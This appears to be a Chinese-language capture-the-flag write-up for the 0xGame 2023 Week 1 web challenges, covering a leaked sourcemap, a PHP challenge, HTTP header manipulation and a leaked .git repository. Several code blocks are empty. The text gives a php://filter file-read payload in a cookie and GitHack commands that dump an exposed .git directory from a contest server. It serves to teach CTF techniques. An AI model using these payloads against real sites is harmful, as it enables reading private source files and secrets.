0xgame-2023
web
[Week 1] signin
信息收集,查看源码发现assets/index-33309f51.js
,打开后在页面最底部可发现一个sourceMappingURL=index-33309f51.js.map
,猜测可能是sourcemap文件泄露
/assets/index-33309f51.js.map
下载文件,找到flag
[Week 1] baby_php
1 |
|
payload:
1 |
|
Post: c=1024.1a
Cookie: name=php://filter/convert.base64-encode/resource=flag
[Week 1] hello_http
get方式传参
1 |
|
post方式传参
1 |
|
更改Cookie
1 |
|
加XFF头
1 |
|
改UA头
1 |
|
改Referer
1 |
|
得到flag
[Week 1] repo_leak
python2 GitHack.py http://120.27.148.152:50013/.git
https://blog.csdn.net/COCOLI_BK/article/details/103344407
git log
git reflog
查看历史版本
git reset --hard 8a5b670558921bd232d75b29542492f00698298b
切换至有flag的版本
grep -r "flag" ./
当前目录匹配含flag文件
0xgame-2023
http://example.com/2023/10/07/比赛/0xgame-2023/